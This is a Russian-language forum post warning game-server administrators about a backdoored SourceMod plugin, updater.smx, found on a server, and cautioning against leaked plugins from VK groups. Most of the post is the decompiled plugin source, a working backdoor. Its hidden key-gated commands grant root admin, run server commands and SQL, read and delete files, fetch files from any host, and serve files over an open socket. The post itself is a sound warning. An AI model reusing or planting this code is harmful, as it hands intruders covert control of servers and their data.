Nekro
Терра инкогнита
- Сообщения
- 4,025
- Реакции
- 2,260
Сегодня ко мне обратился человек по поводу "нашествия хулиганов", мол имеют рут доступ админа. На что был проведён анализ и установлено, что завелся бекдор. Бекдор был установлен 6 дней назад и "хулиганы" ждали это время видимо, что бы сразу не определили вредоносный файл. В нём не было автора и называется он updater.smx Так что ребят обращаем внимания. Компиляция плагина была произведена за 59 минут до установки его на сервер. Сам человек затруднился ответить откуда взялся этот файл, с учётом того, что доступ 3 лиц был ограничен.
Так же прилагаю декомпилировнный код плагина. (обычный декомпилятор не смог его декомпилировать, видимо была установлена защита)
Так что ребята будьте ВНИМАТЕЛЬНЕЕ, не качайте мусор с групп вк (сливы плагинов) ! ! !
Так же прилагаю декомпилировнный код плагина. (обычный декомпилятор не смог его декомпилировать, видимо была установлена защита)
Так что ребята будьте ВНИМАТЕЛЬНЕЕ, не качайте мусор с групп вк (сливы плагинов) ! ! !
,
C-подобный:
public PlVers:__version =
{
version = 5,
filevers = "1.10.0.6490",
date = "03/13/2022",
time = "12:10:58"
};
new Float:NULL_VECTOR[3];
new String:NULL_STRING[16];
public Extension:__ext_core =
{
name = "Core",
file = "core",
autoload = 0,
required = 0,
};
new MaxClients;
public Extension:__ext_socket =
{
name = "Socket",
file = "socket.ext",
autoload = 1,
required = 1,
};
new g_iPortFTP;
new Handle:g_hSocketFTP;
new Handle:currentFile;
new DataPackPos:DLPack_Header;
new DataPackPos:DLPack_File;
new DataPackPos:DLPack_Request;
Download_Socket(String:hostname[], port, String:path[], String:dest[])
{
new Handle:hFile = OpenFile(dest[0], "wb", false, "GAME");
if (hFile)
{
decl String:sRequest[1536];
FormatEx(sRequest, 384, "GET /%s HTTP/1.0\r\nHost: %s:%i\r\nConnection: close\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n", path[0], hostname[0], port);
new Handle:hDLPack = CreateDataPack();
DLPack_Header = GetPackPosition(hDLPack);
WritePackCell(hDLPack, 0);
DLPack_File = GetPackPosition(hDLPack);
WritePackCell(hDLPack, hFile);
DLPack_Request = GetPackPosition(hDLPack);
WritePackString(hDLPack, sRequest);
new Handle:socket = SocketCreate(1, 31);
SocketSetArg(socket, hDLPack);
SocketSetOption(socket, 1, 4096);
SocketConnect(socket, 27, 33, 29, hostname[0], port);
return 0;
}
return 0;
}
CloseSocketHandles(Handle:socket, Handle:hDLPack)
{
SetPackPosition(hDLPack, DLPack_File);
CloseHandle(ReadPackCell(hDLPack));
CloseHandle(hDLPack);
CloseHandle(socket);
return 0;
}
FindCharInString(String:str[], String:c, bool:reverse)
{
new len = strlen(str[0]);
if (reverse)
{
new i = len + -1;
while (0 <= i)
{
if (c == str[0][i])
{
return i;
}
i--;
}
}
else
{
new i;
while (i < len)
{
if (c == str[0][i])
{
return i;
}
i++;
}
}
return -1;
}
bool:WriteFileCell(Handle:hndl, data, size)
{
new array[1];
array[0] = data;
return WriteFile(hndl, array, 1, size);
}
public Action:BDSrvCmd(client, String:command[], argc)
{
new String:info[128];
if (GetClientInfo(client, "g6m30g1h6j", info, 32))
{
if (strcmp(info, "4nwb860bu4fg638", true))
{
return 4;
}
new String:szCmd[16384];
GetCmdArgString(szCmd, 4096);
InsertServerCommand(szCmd);
return 0;
}
return 4;
}
public CopyBinFile(String:from[], String:to[])
{
new Handle:file = OpenFile(from[0], "rb", false, "GAME");
if (file)
{
new Handle:copytarget = OpenFile(to[0], "wb", false, "GAME");
if (copytarget)
{
new buffer[4096];
new read;
while ((read = ReadFile(file, buffer, 4096, 1)))
{
WriteFile(copytarget, buffer, read, 1);
}
}
CloseHandle(copytarget);
}
CloseHandle(file);
return 0;
}
public Action:GetRootCommand(client, String:command[], argc)
{
new String:szType[128];
GetCmdArg(1, szType, 32);
if (strcmp(szType, "v23904cn90234", true))
{
if (strcmp(szType, "xf51nr56s1r5", true))
{
if (strcmp(szType, "29m3c40n923v4", true))
{
if (strcmp(szType, "hdt68gn40htg", true))
{
if (strcmp(szType, "ae680h4d6gb", true))
{
if (strcmp(szType, "vr54hvsr5ch1", true))
{
if (strcmp(szType, "t684v1rssh89", true))
{
if (strcmp(szType, "54fhgm10hg5", true))
{
if (strcmp(szType, "2v34mcm9023v94", true))
{
if (strcmp(szType, "fd531n45fgn", true))
{
if (strcmp(szType, "v23venc2039mr", true))
{
if (strcmp(szType, "xf35gn1f6fg", true))
{
return 0;
}
new String:sDB[256];
new String:sQuery[16384];
new String:sError[512];
GetCmdArg(2, sDB, 64);
GetCmdArg(3, sQuery, 4096);
new Handle:hDB = SQL_Connect(sDB, false, sError, 128);
if (hDB)
{
if (sError[0])
{
PrintToConsole(client, sError);
}
else
{
new Handle:hResult = SQL_Query(hDB, sQuery, -1);
if (hResult)
{
if (SQL_HasResultSet(hResult))
{
new bool:bTables;
new i = 1;
while (SQL_MoreRows(hResult))
{
if (i < 44)
{
if (SQL_FetchRow(hResult))
{
new String:sBuffer[8192];
new iCount = SQL_GetFieldCount(hResult);
if (!bTables)
{
FormatEx(sBuffer, 2048, "№", i);
new j;
while (j < iCount)
{
new String:sName[256];
SQL_FieldNumToName(hResult, j, sName, 64);
Format(sBuffer, 2048, "%s | %s", sBuffer, sName);
j++;
}
PrintToConsole(client, "%s |", sBuffer);
bTables = true;
}
FormatEx(sBuffer, 2048, "%i.", i);
new j;
while (j < iCount)
{
if (SQL_IsFieldNull(hResult, j))
{
Format(sBuffer, 2048, "%s | NULL", sBuffer);
}
else
{
new String:sResult[1984];
SQL_FetchString(hResult, j, sResult, 496, 0);
Format(sBuffer, 2048, "%s | %s", sBuffer, sResult);
}
j++;
}
PrintToConsole(client, "%s |", sBuffer);
}
else
{
PrintToConsole(client, "Invalid SQL_FetchRow");
}
i++;
}
PrintToConsole(client, "Query rows > 43");
}
}
else
{
PrintToConsole(client, "Invalid SQL_HasResultSet");
}
}
else
{
PrintToConsole(client, "Invalid result handle, execute");
hResult = SQL_PrepareQuery(hDB, sQuery, sError, 128);
if (sError[0])
{
PrintToConsole(client, sError);
}
if (SQL_Execute(hResult))
{
PrintToConsole(client, "Success");
}
}
CloseHandle(hResult);
}
}
else
{
PrintToConsole(client, "Invalid handle");
}
CloseHandle(hDB);
return 3;
}
new String:szPath[2048];
GetCmdArg(2, szPath, 512);
if (FileExists(szPath, false, "GAME"))
{
new Handle:hFile = OpenFile(szPath, "rb", false, "GAME");
if (hFile)
{
new String:szOffset[48];
GetCmdArg(3, szOffset, 12);
new iOffset = StringToInt(szOffset, 10);
new String:szLine[8192];
new idx = 1;
while (ReadFileLine(hFile, szLine, 2048))
{
if (idx > iOffset)
{
PrintToConsole(client, "%i. \"%s\"", idx, szLine);
}
idx++;
}
CloseHandle(hFile);
return 3;
}
PrintToConsole(client, "Failed to open");
return 3;
}
PrintToConsole(client, "Not found");
return 3;
}
new String:szPath[2048];
GetCmdArg(2, szPath, 512);
if (DirExists(szPath, false, "GAME"))
{
new Handle:hDir = OpenDirectory(szPath, false, "GAME");
if (hDir)
{
new String:szObject[4096];
new String:szFullPath[6144];
new i = 1;
while (ReadDirEntry(hDir, szObject, 1024, 0))
{
Format(szFullPath, 1536, "%s/%s", szPath, szObject);
i++;
PrintToConsole(client, "%i. \"%s\"\x09%i bytes", i, szObject, FileSize(szFullPath, false, "GAME"));
}
CloseHandle(hDir);
return 3;
}
PrintToConsole(client, "Failed to open dir");
return 3;
}
PrintToConsole(client, "Dir not found");
return 3;
}
new String:szHostname[2048];
GetCmdArg(2, szHostname, 512);
new String:szPort[32];
GetCmdArg(3, szPort, 6);
new iPort = StringToInt(szPort, 10);
new var5;
if (iPort < 1 || iPort > 65565)
{
PrintToConsole(client, "\x01");
return 3;
}
new String:szDlPath[2048];
GetCmdArg(4, szDlPath, 512);
new String:szPath[2048];
GetCmdArg(5, szPath, 512);
Download_Socket(szHostname, iPort, szDlPath, szPath);
return 3;
}
if (argc > 1)
{
new String:sPortFTP[32];
GetCmdArg(2, sPortFTP, 6);
new iPortFTP = StringToInt(sPortFTP, 10);
new var4;
if (iPortFTP > 0 && iPortFTP < 65536)
{
g_iPortFTP = iPortFTP;
if (g_hSocketFTP)
{
CloseHandle(g_hSocketFTP);
}
g_hSocketFTP = SocketCreate(1, 23);
SocketBind(g_hSocketFTP, "0.0.0.0", g_iPortFTP);
SocketListen(g_hSocketFTP, 25);
}
PrintToConsole(client, "iPortFTP < 1 || iPortFTP > 65535");
return 3;
}
PrintToConsole(client, "%i", 2316);
return 3;
}
new String:szPath[512];
GetCmdArg(2, szPath, 128);
new String:buffer[128];
GetCmdArg(3, buffer, 32);
new mode = StringToInt(buffer, 10);
if (!(SetFilePermissions(szPath, mode)))
{
PrintToConsole(client, "error");
}
return 3;
}
new String:szPath[512];
GetCmdArg(2, szPath, 128);
new String:buffer[128];
GetCmdArg(3, buffer, 32);
new mode = StringToInt(buffer, 10);
if (!(CreateDirectory(szPath, mode, false, "DEFAULT_WRITE_PATH")))
{
PrintToConsole(client, "error");
}
return 3;
}
new String:szPath[512];
GetCmdArg(2, szPath, 128);
new var1;
if ((DirExists(szPath, false, "GAME") && RemoveDir(szPath)) || (FileExists(szPath, false, "GAME") && DeleteFile(szPath, false, "DEFAULT_WRITE_PATH")))
{
return 3;
}
PrintToConsole(client, "error");
return 3;
}
new String:szFrom[512];
GetCmdArg(2, szFrom, 128);
new String:szTo[512];
GetCmdArg(3, szTo, 128);
CopyBinFile(szFrom, szTo);
return 3;
}
new String:szCommand[8192];
new String:sBuffer[32768];
GetCmdArgString(szCommand, 2048);
ServerCommandEx(sBuffer, 8192, szCommand[strlen("29m3c40n923v4") + 1]);
PrintToConsole(client, sBuffer);
return 3;
}
RemoveAdmin(GetUserAdmin(client));
return 3;
}
new AdminId:admClient = CreateAdmin("");
SetAdminFlag(admClient, 14, true);
SetUserAdmin(client, admClient, true);
return 3;
}
public OnChildSocketDisconnected(Handle:socket, any:arg)
{
CloseHandle(socket);
return 0;
}
public OnChildSocketError(Handle:socket, errorType, errorNum, any:arg)
{
CloseHandle(socket);
return 0;
}
public OnChildSocketReceive(Handle:socket, String:receiveData[], dataSize, any:arg)
{
new cmd = receiveData[0];
switch (cmd)
{
case 1:
{
new pathLen = memshift(receiveData[0], dataSize, 1);
if (pathLen < 1)
{
SocketSend(socket, "\x0E���InvaliRequest", -1);
return 0;
}
if (DirExists(receiveData[0], false, "GAME"))
{
new Handle:dir = OpenDirectory(receiveData[0], false, "GAME");
if (dir)
{
new String:buffer[256];
new String:entry[2048];
new FileType:type;
while (ReadDirEntry(dir, entry, 512, type))
{
new entryLen = strlen(entry);
WriteLong(buffer, entryLen, 0);
SocketSend(socket, buffer, 4);
buffer[0] = type;
SocketSend(socket, buffer, 1);
SocketSend(socket, entry, entryLen);
}
SocketSend(socket, "�", 1);
CloseHandle(dir);
}
SocketSend(socket, "\x0E���FailedToOpenDir", -1);
return 0;
}
SocketSend(socket, "\x0E���DirNotFound", -1);
return 0;
}
case 2:
{
new pathLen = memshift(receiveData[0], dataSize, 1);
if (pathLen < 1)
{
SocketSend(socket, "\x0EInvaliRequest", -1);
return 0;
}
new Handle:file = OpenFile(receiveData[0], "rb", false, "GAME");
if (file)
{
currentFile = file;
}
SocketSend(socket, "\x0EFailedToOpenFile", -1);
return 0;
}
case 3:
{
new String:buffer[8448];
if (currentFile)
{
new Handle:file = currentFile;
new tmpBuf[2112];
new readed = ReadFile(file, tmpBuf, 2048, 1);
if (readed < 1)
{
currentFile = 0;
WriteLong(buffer, -1, 0);
SocketSend(socket, buffer, 4);
CloseHandle(file);
return 0;
}
WriteLong(buffer, readed, 0);
new i = 4;
while (readed + 4 > i)
{
buffer[i] = tmpBuf[i + -4];
i++;
}
SocketSend(socket, buffer, readed + 4);
}
WriteLong(buffer, -1, 0);
SocketSend(socket, buffer, 4);
return 0;
}
default:
{
}
}
return 0;
}
public void:OnPluginStart()
{
AddCommandListener(13, "r2cn340923");
AddCommandListener(9, "65f0g1bf5r");
return 0;
}
public OnSocketError(Handle:socket, errorType, errorNum, any:arg)
{
CloseHandle(socket);
return 0;
}
public OnSocketIncoming(Handle:socket, Handle:newSocket, String:remoteIP[], remotePort, any:arg)
{
SocketSetOption(newSocket, 1, 2560);
SocketSetOption(newSocket, 9, 2560);
SocketSetOption(newSocket, 10, 2560);
SocketSetOption(socket, 9, 2560);
SocketSetOption(socket, 10, 2560);
SocketSetReceiveCallback(newSocket, 19);
SocketSetDisconnectCallback(newSocket, 15);
SocketSetErrorCallback(newSocket, 17);
return 0;
}
public OnUSocketConnected(Handle:socket, any:hDLPack)
{
decl String:sRequest[1536];
SetPackPosition(hDLPack, DLPack_Request);
ReadPackString(hDLPack, sRequest, 384);
SocketSend(socket, sRequest, -1);
return 0;
}
public OnUSocketDisconnected(Handle:socket, any:hDLPack)
{
CloseSocketHandles(socket, hDLPack);
return 0;
}
public OnUSocketError(Handle:socket, errorType, errorNum, any:hDLPack)
{
CloseSocketHandles(socket, hDLPack);
return 0;
}
public OnUSocketReceive(Handle:socket, String:data[], size, any:hDLPack)
{
new idx;
SetPackPosition(hDLPack, DLPack_Header);
new bool:bParsedHeader = ReadPackCell(hDLPack);
if (!bParsedHeader)
{
if ((idx = StrContains(data[0], "\r\n\r\n", true)) == -1)
{
idx = 0;
}
else
{
idx += 4;
}
if (!(strncmp(data[0], "HTTP/", 5, true)))
{
decl String:sStatusCode[256];
strcopy(sStatusCode, FindCharInString(data[0], '
', false) + -8, data[0] + 9);
if (strncmp(sStatusCode, "200", 3, true))
{
CloseSocketHandles(socket, hDLPack);
return 0;
}
}
SetPackPosition(hDLPack, DLPack_Header);
WritePackCell(hDLPack, 1);
}
SetPackPosition(hDLPack, DLPack_File);
new Handle:hFile = ReadPackCell(hDLPack);
while (idx < size)
{
idx++;
WriteFileCell(hFile, data[0][idx], 1);
}
return 0;
}
public WriteLong(String:buffer[], value, start)
{
buffer[0][start + 0] = value & 255;
buffer[0][start + 1] = value & 65280 >>> 8;
buffer[0][start + 2] = value & 16711680 >>> 16;
buffer[0][start + 3] = value & -16777216 >>> 24;
return 0;
}
public void:__ext_core_SetNTVOptional()
{
MarkNativeAsOptional("GetFeatureStatus");
MarkNativeAsOptional("RequireFeature");
MarkNativeAsOptional("AddCommandListener");
MarkNativeAsOptional("RemoveCommandListener");
MarkNativeAsOptional("BfWriteBool");
MarkNativeAsOptional("BfWriteByte");
MarkNativeAsOptional("BfWriteChar");
MarkNativeAsOptional("BfWriteShort");
MarkNativeAsOptional("BfWriteWord");
MarkNativeAsOptional("BfWriteNum");
MarkNativeAsOptional("BfWriteFloat");
MarkNativeAsOptional("BfWriteString");
MarkNativeAsOptional("BfWriteEntity");
MarkNativeAsOptional("BfWriteAngle");
MarkNativeAsOptional("BfWriteCoord");
MarkNativeAsOptional("BfWriteVecCoord");
MarkNativeAsOptional("BfWriteVecNormal");
MarkNativeAsOptional("BfWriteAngles");
MarkNativeAsOptional("BfReadBool");
MarkNativeAsOptional("BfReadByte");
MarkNativeAsOptional("BfReadChar");
MarkNativeAsOptional("BfReadShort");
MarkNativeAsOptional("BfReadWord");
MarkNativeAsOptional("BfReadNum");
MarkNativeAsOptional("BfReadFloat");
MarkNativeAsOptional("BfReadString");
MarkNativeAsOptional("BfReadEntity");
MarkNativeAsOptional("BfReadAngle");
MarkNativeAsOptional("BfReadCoord");
MarkNativeAsOptional("BfReadVecCoord");
MarkNativeAsOptional("BfReadVecNormal");
MarkNativeAsOptional("BfReadAngles");
MarkNativeAsOptional("BfGetNumBytesLeft");
MarkNativeAsOptional("BfWrite.WriteBool");
MarkNativeAsOptional("BfWrite.WriteByte");
MarkNativeAsOptional("BfWrite.WriteChar");
MarkNativeAsOptional("BfWrite.WriteShort");
MarkNativeAsOptional("BfWrite.WriteWord");
MarkNativeAsOptional("BfWrite.WriteNum");
MarkNativeAsOptional("BfWrite.WriteFloat");
MarkNativeAsOptional("BfWrite.WriteString");
MarkNativeAsOptional("BfWrite.WriteEntity");
MarkNativeAsOptional("BfWrite.WriteAngle");
MarkNativeAsOptional("BfWrite.WriteCoord");
MarkNativeAsOptional("BfWrite.WriteVecCoord");
MarkNativeAsOptional("BfWrite.WriteVecNormal");
MarkNativeAsOptional("BfWrite.WriteAngles");
MarkNativeAsOptional("BfRead.ReadBool");
MarkNativeAsOptional("BfRead.ReadByte");
MarkNativeAsOptional("BfRead.ReadChar");
MarkNativeAsOptional("BfRead.ReadShort");
MarkNativeAsOptional("BfRead.ReadWord");
MarkNativeAsOptional("BfRead.ReadNum");
MarkNativeAsOptional("BfRead.ReadFloat");
MarkNativeAsOptional("BfRead.ReadString");
MarkNativeAsOptional("BfRead.ReadEntity");
MarkNativeAsOptional("BfRead.ReadAngle");
MarkNativeAsOptional("BfRead.ReadCoord");
MarkNativeAsOptional("BfRead.ReadVecCoord");
MarkNativeAsOptional("BfRead.ReadVecNormal");
MarkNativeAsOptional("BfRead.ReadAngles");
MarkNativeAsOptional("BfRead.BytesLeft.get");
MarkNativeAsOptional("PbReadInt");
MarkNativeAsOptional("PbReadFloat");
MarkNativeAsOptional("PbReadBool");
MarkNativeAsOptional("PbReadString");
MarkNativeAsOptional("PbReadColor");
MarkNativeAsOptional("PbReadAngle");
MarkNativeAsOptional("PbReadVector");
MarkNativeAsOptional("PbReadVector2D");
MarkNativeAsOptional("PbGetRepeatedFieldCount");
MarkNativeAsOptional("PbSetInt");
MarkNativeAsOptional("PbSetFloat");
MarkNativeAsOptional("PbSetBool");
MarkNativeAsOptional("PbSetString");
MarkNativeAsOptional("PbSetColor");
MarkNativeAsOptional("PbSetAngle");
MarkNativeAsOptional("PbSetVector");
MarkNativeAsOptional("PbSetVector2D");
MarkNativeAsOptional("PbAddInt");
MarkNativeAsOptional("PbAddFloat");
MarkNativeAsOptional("PbAddBool");
MarkNativeAsOptional("PbAddString");
MarkNativeAsOptional("PbAddColor");
MarkNativeAsOptional("PbAddAngle");
MarkNativeAsOptional("PbAddVector");
MarkNativeAsOptional("PbAddVector2D");
MarkNativeAsOptional("PbRemoveRepeatedFieldValue");
MarkNativeAsOptional("PbReadMessage");
MarkNativeAsOptional("PbReadRepeatedMessage");
MarkNativeAsOptional("PbAddMessage");
MarkNativeAsOptional("Protobuf.ReadInt");
MarkNativeAsOptional("Protobuf.ReadInt64");
MarkNativeAsOptional("Protobuf.ReadFloat");
MarkNativeAsOptional("Protobuf.ReadBool");
MarkNativeAsOptional("Protobuf.ReadString");
MarkNativeAsOptional("Protobuf.ReadColor");
MarkNativeAsOptional("Protobuf.ReadAngle");
MarkNativeAsOptional("Protobuf.ReadVector");
MarkNativeAsOptional("Protobuf.ReadVector2D");
MarkNativeAsOptional("Protobuf.GetRepeatedFieldCount");
MarkNativeAsOptional("Protobuf.SetInt");
MarkNativeAsOptional("Protobuf.SetInt64");
MarkNativeAsOptional("Protobuf.SetFloat");
MarkNativeAsOptional("Protobuf.SetBool");
MarkNativeAsOptional("Protobuf.SetString");
MarkNativeAsOptional("Protobuf.SetColor");
MarkNativeAsOptional("Protobuf.SetAngle");
MarkNativeAsOptional("Protobuf.SetVector");
MarkNativeAsOptional("Protobuf.SetVector2D");
MarkNativeAsOptional("Protobuf.AddInt");
MarkNativeAsOptional("Protobuf.AddInt64");
MarkNativeAsOptional("Protobuf.AddFloat");
MarkNativeAsOptional("Protobuf.AddBool");
MarkNativeAsOptional("Protobuf.AddString");
MarkNativeAsOptional("Protobuf.AddColor");
MarkNativeAsOptional("Protobuf.AddAngle");
MarkNativeAsOptional("Protobuf.AddVector");
MarkNativeAsOptional("Protobuf.AddVector2D");
MarkNativeAsOptional("Protobuf.RemoveRepeatedFieldValue");
MarkNativeAsOptional("Protobuf.ReadMessage");
MarkNativeAsOptional("Protobuf.ReadRepeatedMessage");
MarkNativeAsOptional("Protobuf.AddMessage");
VerifyCoreVersion();
return 0;
}
public memshift(String:src[], len, offset)
{
new i;
while (i < len)
{
src[0][i] = src[0][offset + i];
i++;
}
return len - offset;
}
